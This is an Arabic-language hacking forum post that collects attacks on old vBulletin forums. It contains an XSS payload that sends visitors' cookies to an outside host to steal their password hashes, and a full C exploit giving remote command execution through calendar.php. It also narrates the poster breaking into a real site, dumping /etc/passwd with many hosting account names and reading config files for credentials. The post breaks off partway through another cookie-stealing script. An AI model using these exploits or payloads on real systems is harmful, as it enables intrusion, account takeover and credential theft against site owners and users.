Admin Admin
عدد المساهمات : 845 نقاط : 2425 عضو مميز : 7 تاريخ التسجيل : 23/11/2009 العمر : 39 الموقع : ÙÙ‰ كل مكان اجد Ùيه طموØاتى واØلامى
| موضوع: vBulletinاختراق منتديات الــ السبت مارس 27, 2010 12:52 pm | |
| تأكد من وجود ملف calendar.php إذا كان موجود إدخل هذا العنوان المتغيرات 1-example.com بإسم الموقع 2-<command> بأي أمر من أوامر لينكس _____________________________________________vBulletin 1-------------------------------------------------------------------Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord% 2Ephp%3Fcook%3D%27%2B escape%28document%2Ecookie%29%3C%2Fscript%3E (NOTE: The URL should be on a one line) You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file: <script> location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D %27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco rd%2Ephp%3Fcook%3D%27 %2Bescape%28document%2Ecookie%29%3C%2Fscript%3E" </script> And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/cookie stealing code, and then to [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] With the recorded user id and password hash, we can access the site: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] hash] ------------------------------------------------------------------------------__________________________________vbulletin2 gosper is credited with disclosing this to securiteam on 9-24-02 along with a working exploit and he probably discovered it too. I wrote this because his exploit didn't URL encode all the characters that needed to be URL encoded in order for some of the inputted commands to work properly. I added a date argument which is essential for exploiting the security hole. I also used an fdopen() and fgets() to make sure all the output was recieved and displayed correctly, at least I hope it works better . Last thing I built in was HTTP version 1.1 support so that you can use this against virtual hosts. Yeah... and you can exploit this with a web browser too, its just easier to use this program, most of the time. Greetz to JadaCyrus, Terrorist, IreEnigma, badpack3t, biocenosis, ttye0, End of Days, sk3tch and all the people in #ozane (http://www.ozane.net/). If I forgot you, well shit. Compile: gcc vbcal.c -o vbcal */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <signal.h> #include <unistd.h> #define url1 "calendar.php?calbirthdays=1&action=getday&day=" #define url2 "&comma=%22;echo%20'';%20echo%20%60" #define url3 "%60;die();echo%22" void time_out(void) { printf("\ntimed out on connect()\n"); exit(0); } void usage (char *prog) { printf("\n\t %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout] [-v (verbose)]\n\n", prog); printf("\t The -h and -d arguments are required, the rest are optional."); printf("\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14 2002."); printf("\n\t date must also be a date on the vBulletin board that has an event on it.\n"); printf("\n\t **Note: if you get a HTML dump of a vBulletin page, you probably used a date without an event on it."); printf("\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8", prog); printf("\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20 -v\n\n", prog); exit(0); } int main(int argc, char *argv[]) { int c, x, sockfd, verbose = 0; int timeout = 10; /* timeout for connection */ int port = 80; /* 80 default for HTTPD */ char *path = "/"; /* url path, default = "/" */ char *host = NULL, *date = NULL; char sign = '%'; char *prog; char tmp[2]; char tmp2[4]; char cmd_buf[501]; char encoded_cmd[501]; char data[1024]; char output[20480]; /* 20k recv buf */ struct sockaddr_in addr; struct hostent *he; struct sigaction action; FILE *f; memset(&tmp, '\0', sizeof(tmp)); memset(&tmp2, '\0', sizeof(tmp2)); memset(&cmd_buf, '\0', sizeof(cmd_buf)); memset(&encoded_cmd, '\0', sizeof(encoded_cmd)); memset(&data, '\0', sizeof(data)); memset(&output, '\0', sizeof(output)); prog = argv[0]; fprintf(stderr, "\t ---[ vb_cal.c\n"); fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar exploit\n"); fprintf(stderr, "\t ---[ c0ded by st0ic\n"); fprintf(stderr, "\t ---[ [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] if (argc < 5 || argc > 12) usage(prog); while ( (c = getopt(argc, argv, "h:d:u:t:v")) != -1 ) { switch(c) { case 'h': /* host */ { host = optarg; break; } case 'd': { date = optarg; break; } case 'u': /* url path */ { path = optarg; break; } case 'p': /* port */ { port = atoi(optarg); break; } case 't': /* connect timeout */ { timeout = atoi(optarg); break; } case 'v': { verbose = 1; break; } default: usage(prog); } } /* make sure we got the required stuff */ if (host == NULL) usage(prog); else if (date == NULL) usage(prog); if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket()"); exit(1); } if ( (he = gethostbyname(host)) == NULL) { perror("gethostbyname()"); exit(1); } bzero(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr = *( (struct in_addr *)he->h_addr); addr.sin_port = htons(port); bzero(&action, sizeof(action)); action.sa_handler = (void *)time_out; action.sa_flags = 0; sigaction(SIGALRM, &action, 0); alarm(timeout); if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1) { perror("connect()"); exit(1); } alarm(0); printf("\\q to exit cmd prompt\n"); while(1) { printf("cmd> "); fgets(cmd_buf, sizeof(cmd_buf), stdin); for (x = 0; x < strlen(cmd_buf); x++) if (cmd_buf[x] == '\n') cmd_buf[x] = '\0'; if ( (cmd_buf[0] == '' && cmd_buf[1] == 'q') ) exit(0); for (x = 0; x < strlen(cmd_buf); x++) { tmp[0] = cmd_buf[x]; /* 0 - 9 */ if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) ) strncat(encoded_cmd, tmp, sizeof(encoded_cmd)); /* A - Z */ else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) ) strncat(encoded_cmd, tmp, sizeof(encoded_cmd)); /* a - z */ else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) ) strncat(encoded_cmd, tmp, sizeof(encoded_cmd)); /* everything not a letter or number */ else { snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]); strncat(encoded_cmd, tmp2, sizeof(encoded_cmd)); } } /* use HTTP/1.1 in order to send valid HTTP commands to virtual hosts */ snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1\nHost: %s\n\n", path, url1, date, url2, encoded_cmd, url3, host); /* be verbose about the string we're sending in case we need to debug. */ if (verbose == 1) printf("\nSending: %s", data); send(sockfd, data, sizeof(data), 0); if ( (f = fdopen(sockfd, "r+") ) == NULL) { perror("fdopen()"); exit(1); } while(1) { fgets(output, sizeof(output), f); if (feof(f) != 0) break; else printf("%s", output); memset(&output, '\0', sizeof(output)); } memset(&cmd_buf, '\0', sizeof(cmd_buf)); memset(&encoded_cmd, '\0', sizeof(encoded_cmd)); memset(&data, '\0', sizeof(data)); memset(&output, '\0', sizeof(output)); fclose(f); if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket()"); exit(1); } alarm(timeout); if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1) { perror("connect()"); exit(1); } alarm(0); } return 0; } ----------------------------------- vBulletin 3 quote: -----------------Originally posted by MAKS: Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord% 2Ephp%3Fcook%3D%27%2B escape%28document%2Ecookie%29%3C%2Fscript%3E (NOTE: The URL should be on a one line) You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file: <script> location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D %27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco rd%2Ephp%3Fcook%3D%27 %2Bescape%28document%2Ecookie%29%3C%2Fscript%3E" </script> And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/cookie stealing code, and then to [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] With the recorded user id and password hash, we can access the site: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] hash] ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ ثغرة في منتديات vbulletin 2.0.3 بسم الله الرحمن الرحيم الثغرة وظيفتها ببساطة انها تسمحلك تنفذ اوامر على الجهاز زي البي اتش بي شيل فرحنا انا و صاحبي لاعز صديق للهكر الاخ قوقل و قلناله جبلنا مواقع شغالة على vbulletin 2.0.3 طبعا ما قصر قوقل و جبلنا لسته فاخترنا وحدة منهم و كان الموقع هو و طبقنا الثغرة ظهر الشكل و مكان <command> نحط الامر الي بدنا ياه فاول شي قلنا خلينا نعرف مين نحنا فحطينا whoami و الي طلع انا استبشرت خير على الاقل مني nobody فقلت خليني اخد نظرة على ملف الباسوورد و اشوف المواقع على السيرفر فحطيت cat /etc/passwd مكان <command> و طلع root0:0:root:/root:/bin/bash bin1:1:bin:/bin: daemon2:2:daemon:/sbin: adm3:4:adm:/var/adm: lp4:7:lp:/var/spool/lpd: sync5:0:sync:/sbin:/bin/sync shutdown6:0:shutdown:/sbin:/sbin/shutdown halt7:0:halt:/sbin:/sbin/halt mail8:12:mail:/var/spool/mail: news9:13:news:/var/spool/news: uucp10:14:uucp:/var/spool/uucp: operator11:0perator:/root: games12games:/usr/games: gopher13:30:gopher:/usr/lib/gopher-data: ftp14:50:FTP User:/home/ftp: nobody99:99:Nobody:/: gtd501:/home/gtd:/bin/bash majordomo504:103::/home/majordomo:/bin/bash quota25:*:505:1::/home/quota25: quota50:*:506:1::/home/quota50: quota75:*:507:1::/home/quota75: quota100:*:508:1::/home/quota100: quota150:*:509:1::/home/quota150: quota300:*:510:1::/home/quota300: quota2:*:511:1::/home/quota2: quota5:*:512:1::/home/quota5: quota10:*:513:1::/home/quota10: msql497:/home/msql:/bin/bash userquota503quota:/home/userquota:/bin/bash johnv:*:516:1::/home/johnv: minerva514:516::/home/minerva:/bin/bash taosfineart517:517::/home/taosfineart:/bin/bash technoasylum518:518::/home/technoasylum:/bin/bash ward-tech519:519::/home/ward-tech:/bin/bash malio522:522::/home/malio:/bin/bash cindyland529:529::/home/cindyland:/bin/bash mathom-house532:532::/home/mathom-house:/bin/bash libertywebhosting534:534::/home/libertywebhosting:/bin/bash bonfiglioreed537:537::/home/bonfiglioreed:/bin/bash oldtymespizza539:539::/home/oldtymespizza:/bin/bash dogshowjournal546:545::/home/dogshowjournal:/bin/bash surfclassic550:549::/home/surfclassic:/bin/bash thomason-development552:551::/home/thomason-development:/bin/bash james553:534::/home/james:/bin/emailonly alexr554:534::/home/alexr:/bin/emailonly god555:522::/home/god:/bin/emailonly sales556:522::/home/sales:/bin/bash info557:522::/home/info:/bin/emailonly ryugen558:552::/home/ryugen:/bin/bash allanart566:559::/home/allanart:/bin/bash womensphotoworks573:564::/home/womensphotoworks:/bin/bash mbaentry576:567::/home/mbaentry:/bin/bash omahasoaring577:568::/home/omahasoaring:/bin/bash talvee582:549::/home/talvee:/bin/emailonly mobilewashenvironmental585:572::/home/mobilewashenvironmental:/bin/bash mobilewashservices589:576::/home/mobilewashservices:/bin/bash ocdeaf591:578::/home/ocdeaf:/bin/bash foxfire-goldens592:579::/home/foxfire-goldens:/bin/bash finchair594:580::/home/finchair:/bin/bash americanabatement595:581::/home/americanabatement:/bin/bash whiskersgraphics596:582::/home/whiskersgraphics:/bin/bash ronemous604:568::/home/ronemous:/bin/emailonly parrotranch605:588::/home/parrotranch:/bin/bash erlefamily606:589::/home/erlefamily:/bin/ftponly parduhn610:593::/home/parduhn:/bin/bash riptideproductions616:596::/home/riptideproductions:/bin/bash kaialece626:604::/home/kaialece:/bin/bash zeeksystems627:605::/home/zeeksystems:/bin/bash trevor630:596::/home/trevor:/bin/emailonly dino631:522::/home/dino:/bin/emailonly loconsigo632:608::/home/loconsigo:/bin/bash delamerevineyard643:613::/home/delamerevineyard:/bin/bash michael652:605::/home/michael:/bin/emailonly jereme654:596::/home/jereme:/bin/emailonly windows-tips655:624::/home/windows-tips:/bin/bash ghost-ride657:626::/home/ghost-ride:/bin/bash cprltd663:629::/home/cprltd:/bin/bash batmanandbarbie673:636::/home/batmanandbarbie:/bin/bash housegroove674:637::/home/housegroove:/bin/bash washglass675:638::/home/washglass:/bin/bash djmattson676:639::/home/djmattson:/bin/bash statecapitols677:640::/home/statecapitols:/bin/bash kanjiweb678:641::/home/kanjiweb:/bin/bash freevg681:644::/home/freevg:/bin/bash writersresource682:645::/home/writersresource:/bin/bash evilgraphics684:647::/home/evilgraphics:/bin/bash magdalenhsuli690:650::/home/magdalenhsuli:/bin/bash antioch704:659::/home/antioch:/bin/bash lifelinks705:660::/home/lifelinks:/bin/bash sinecos707:662::/home/sinecos:/bin/bash dosdonas711:666::/home/dosdonas:/bin/bash accuratelegalprocessingse713:668::/home/accuratelegalprocessingse:/bin/bash jc716:581::/home/jc:/bin/emailonly jo717:581::/home/jo:/bin/emailonly infoaai719:581::/home/infoaai:/bin/emailonly gypsytejas721:671::/home/gypsytejas:/bin/bash j-j-c724:674::/home/j-j-c:/bin/bash camp726:660::/home/camp:/bin/emailonly marinabaypark740:677::/home/marinabaypark:/bin/bash gypsy741:671::/home/gypsy:/bin/emailonly meg749:593::/home/meg:/bin/emailonly huwe751:679::/home/huwe:/bin/bash ultimateautomotive50753:681::/home/ultimateautomotive50:/bin/bash socceracademypa755:683::/home/socceracademypa:/bin/bash phoenixfamilymuseum761:689::/home/phoenixfamilymuseum:/bin/bash videoteacher762:690::/home/videoteacher:/bin/bash spiffydesign765:693::/home/spiffydesign:/bin/bash nawaf766:694::/home/nawaf:/bin/bash ccdump768:696::/home/ccdump:/bin/bash drwizard-atlanta772:700::/home/drwizard-atlanta:/bin/bash showme-powerchutes777:705::/home/showme-powerchutes:/bin/bash shellmandanceacademy778:706::/home/shellmandanceacademy:/bin/bash samelec779:707::/home/samelec:/bin/bash pet-odor780:708::/home/pet-odor:/bin/bash michael1781:593::/home/michael1:/bin/emailonly mmnursereview785:710::/home/mmnursereview:/bin/bash franksland787:712::/home/franksland:/bin/bash gr8gifts4u801:717::/home/gr8gifts4u:/bin/bash globalintercultural806:718::/home/globalintercultural:/bin/bash gotcher-belote807:719::/home/gotcher-belote:/bin/bash francisengineering808:720::/home/francisengineering:/bin/bash befree2814:726::/home/befree2:/bin/bash barclay821:689::/home/barclay:/bin/emailonly airupdate823:732::/home/airupdate:/bin/bash stream825:734::/home/stream:/bin/bash strantech826:735::/home/strantech:/bin/bash newcityftp832:740::/home/newcityftp:/bin/bash nagomifan833:741::/home/nagomifan:/bin/bash gecko834:671::/home/gecko:/bin/emailonly chooseyourlife838:745::/home/chooseyourlife:/bin/bash binarytech839:746::/home/binarytech:/bin/bash <<<طبعا ملف الباس كله طويل لكن حطيته جزء منه مشان تشوفوه>>>> ممم سيرفر جيد و حطيت نسخة عنه في مكتبة ملفات الباسوورد عندي للذكرى المهم نشوف الموقع اشو حكايته romulus2997:837::/home/romulus2:/bin/bash اووووه حركات يوصل ل /bin/bash االمهم فكرت كيف حناخد الباسوورد حق هدا الموقع صاحبي قلي شوف الشادو قلتلو لا تتعب نفسك الشادو هذي الايام مخفي ايام زماااااااااااااااان فقلت خلص نشوف الكونفيق و ان شاء الله يكون صاحب الموقع غبي و حط نفس الباس من ملف الباسوود لاحظت انه الملف هو /home/romulus2 و في طريقة تانية انك تكتب pwd كتبت و طلع /home2/www/romulus2/forum اذا هذا هو مكان ملفات الموقع الصحيحة و اضفت لها /admin/config.php فصار الامر cat /home2/www/romulus2/forum/admin/config.php _________________ طريقة أخرى المتطلبات (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) . المستوى : متوسط ملاحظة : هذه الطريقة ليست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات . تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML .. قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود : <script>document.write('<imgsrc="http://my_ip_address/'+document | |
|